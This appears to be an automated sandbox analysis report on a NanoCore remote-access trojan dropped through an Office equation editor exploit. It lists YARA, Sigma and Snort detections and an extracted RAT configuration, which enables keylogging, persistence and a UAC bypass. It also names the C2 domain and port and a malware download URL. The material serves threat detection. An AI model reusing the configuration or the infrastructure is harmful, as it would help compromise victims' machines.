4.2.catzjt7863.exe.35f0330.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfc63d:$x1: NanoCore.ClientPluginHost 0xfc67a:$x2: IClientNetworkHost 0x1001ad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.catzjt7863.exe.35f0330.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.catzjt7863.exe.35f0330.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfc3a5:$a: NanoCore 0xfc3b5:$a: NanoCore 0xfc5e9:$a: NanoCore 0xfc5fd:$a: NanoCore 0xfc63d:$a: NanoCore 0xfc404:$b: ClientPlugin 0xfc606:$b: ClientPlugin 0xfc646:$b: ClientPlugin 0x17f59:$c: ProjectData 0xfc52b:$c: ProjectData 0xfcf32:$d: DESCrypto 0x1048fe:$e: KeepAlive 0x1028ec:$g: LogClientMessage 0xfeae7:$i: get_Connected 0xfd268:$j: #=q 0xfd298:$j: #=q 0xfd2b4:$j: #=q 0xfd2e4:$j: #=q 0xfd300:$j: #=q 0xfd31c:$j: #=q 0xfd34c:$j: #=q
7.2.RegSvcs.exe.36820f5.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24180:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241ad:$x2: IClientNetworkHost
7.2.RegSvcs.exe.36820f5.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24180:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x2525b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x2419a:$s5: IClientLoggingHost
7.2.RegSvcs.exe.36820f5.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.0.RegSvcs.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.0.RegSvcs.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.0.RegSvcs.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.0.RegSvcs.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.0.RegSvcs.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.RegSvcs.exe.367dacc.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287a9:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287d6:$x2: IClientNetworkHost
7.2.RegSvcs.exe.367dacc.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287a9:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29884:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287c3:$s5: IClientLoggingHost
7.2.RegSvcs.exe.367dacc.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.0.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.0.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.0.RegSvcs.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.RegSvcs.exe.560000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
7.2.RegSvcs.exe.560000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.560000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.RegSvcs.exe.367dacc.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
7.2.RegSvcs.exe.367dacc.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
7.2.RegSvcs.exe.367dacc.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.0.RegSvcs.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.0.RegSvcs.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.0.RegSvcs.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.catzjt7863.exe.359c310.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x15065d:$x1: NanoCore.ClientPluginHost 0x15069a:$x2: IClientNetworkHost 0x1541cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.catzjt7863.exe.359c310.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.catzjt7863.exe.359c310.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1503c5:$a: NanoCore 0x1503d5:$a: NanoCore 0x150609:$a: NanoCore 0x15061d:$a: NanoCore 0x15065d:$a: NanoCore 0x150424:$b: ClientPlugin 0x150626:$b: ClientPlugin 0x150666:$b: ClientPlugin 0x17f59:$c: ProjectData 0x6bf79:$c: ProjectData 0x15054b:$c: ProjectData 0x150f52:$d: DESCrypto 0x15891e:$e: KeepAlive 0x15690c:$g: LogClientMessage 0x152b07:$i: get_Connected 0x151288:$j: #=q 0x1512b8:$j: #=q 0x1512d4:$j: #=q 0x151304:$j: #=q 0x151320:$j: #=q 0x15133c:$j: #=q
4.2.catzjt7863.exe.2459af8.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 60 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\catzjt7863.exe, CommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\catzjt7863.exe, NewProcessName: C:\Users\user\AppData\Roaming\catzjt7863.exe, OriginalFileName: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, ProcessId: 1848

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentImage: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentProcessId: 1848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentImage: C:\Users\user\AppData\Roaming\catzjt7863.exe, ParentProcessId: 1848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2936

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "70bb352e-dceb-4105-9fdd-010e83e2", "Group": "NEW LIFE", "Domain1": "drrkingsleym001.ddns.net", "Domain2": "drrkingsleym001.ddns.net", "Port": 1665, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Antivirus detection for URL or domain

Show sources

Source: http://binatonezx.tk/catzx.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: binatonezx.tk	Virustotal: Detection: 15%	Perma Link
Source: drrkingsleym001.ddns.net	Virustotal: Detection: 7%	Perma Link
Source: drrkingsleym001.ddns.net	Virustotal: Detection: 7%	Perma Link

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\eWoGxZG.exe	Joe Sandbox ML: detected

Source: 7.0.RegSvcs.exe.400000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.0.RegSvcs.exe.400000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.0.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 7.0.RegSvcs.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.2.RegSvcs.exe.560000.3.unpack	Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\catzjt7863.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\catzjt7863.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdblbu source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbs.pdby source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb\W source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdb0. source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdbgs source: RegSvcs.exe, 00000007.00000002.704375005.00000000001E6000.00000004.00000040.sdmp
Source:	Binary string: RegSvcs.pdb source: smtpsvc.exe
Source:	Binary string: ystem.pdb(gR- source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.704389606.00000000001ED000.00000004.00000040.sdmp
Source:	Binary string: System.pdbX source: RegSvcs.exe, 00000007.00000002.706338974.00000000047FD000.00000004.00000001.sdmp

Source: global traffic

DNS query: name: binatonezx.tk

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Code function: 4x nop then jmp 0034C0FAh

4_2_0034C055

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80

Source: winword.exe

Memory has grown: Private usage: 0MB later: 32MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49166 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 103.133.109.121:1665
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 103.133.109.121:1665

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: drrkingsleym001.ddns.net

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: drrkingsleym001.ddns.net

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View	ASN Name: GBTCLOUDUS GBTCLOUDUS

Source: Joe Sandbox View

IP Address: 2.56.59.211 2.56.59.211

Source: global traffic

